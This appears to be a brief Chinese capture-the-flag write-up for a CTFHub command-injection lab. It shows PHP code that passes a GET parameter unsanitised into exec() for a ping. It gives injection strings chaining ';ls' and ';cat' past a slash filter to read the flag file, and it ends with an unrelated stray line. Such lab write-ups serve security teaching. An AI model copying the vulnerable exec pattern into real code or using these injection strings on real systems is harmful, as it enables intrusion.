根据源代码信息可知,过滤掉了/
<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
$ip = $_GET['ip'];
$m = [];
if (!preg_match_all("/\//", $ip, $m)) {
$cmd = "ping -c 4 {$ip}";
exec($cmd, $res);
} else {
$res = $m;
}
}
?>
1. 查看当前目录 127.00.1;ls
2.
127.0.0.1;cd flag_is_here;ls;cat flag_21082715328454.php
ctfhub{32fc4a6e5efacbcfc917e014}
)
)
挂载alist(xiaoya)到本地)
